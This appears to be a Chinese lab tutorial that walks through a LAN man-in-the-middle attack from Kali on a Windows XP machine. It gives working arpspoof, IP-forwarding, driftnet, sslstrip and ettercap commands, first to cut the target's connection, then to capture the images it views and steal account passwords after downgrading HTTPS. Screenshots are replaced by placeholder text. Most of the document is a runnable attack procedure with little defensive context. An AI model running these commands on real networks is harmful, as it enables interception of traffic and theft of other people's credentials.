Contents

准备工具:
攻击机:Kali_Rolling
靶机:WinXP
工具:arpspoof,driftnet,sslstrip,ettercap


虚拟机网络开始为NAT模式,实验断网
arpspoof -i 攻击网卡 -t 目标主机ip 目标网关
攻击一台内网xp
攻击网卡为eth0
Kali_Rolling –> ifconfig,WinXP –> ipconfig看自己ip
目标ip 192.168.10.129
网关192.168.10.2

请输入图片描述

开始攻击
arpspoof -i eth0 -t 192.168.10.129 192.168.10.2
请输入图片描述

目标断网
请输入图片描述

ctrl+c停止攻击,目标可以上网

局域网,网络设置为桥接
请输入图片描述

桥接为同一网段IP
请输入图片描述

局域网魅族metal,笔记本,外加其他未知设备
笔记本IP 107,手机ip 101,kali ip 104,xp ip 102
看一下,虚拟机是否可以上网
请输入图片描述

查看局域网内ip
fping -asg 192.168.1.0/24
6个,1个网关,3个我的,其他两个设备未知,不知道为什么笔记本的107,没有显示
请输入图片描述

首先窃取一下xp浏览的图片
开启ip转发
echo 1 >/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward //查看是否写入1
请输入图片描述

重新开始arp欺骗
arpspoof -i eth0 -t 192.168.1.102 192.168.1.1
请输入图片描述

看一下xp是否断网,没有

窃取图片,截获一下对方浏览的图片,新建终端
driftnet -i eth0
请输入图片描述

好的可以截取到对方浏览的图片信息
请输入图片描述

开启ssh
/etc/init.d/ssh start
请输入图片描述

开启转发
vim /etc/ettercap/etter.conf
请输入图片描述

去掉前面的#
请输入图片描述

用https转http,新建终端
sslstrip -a -f -k
请输入图片描述

窃取对方账号密码
ettercap -Tq -i eth0
请输入图片描述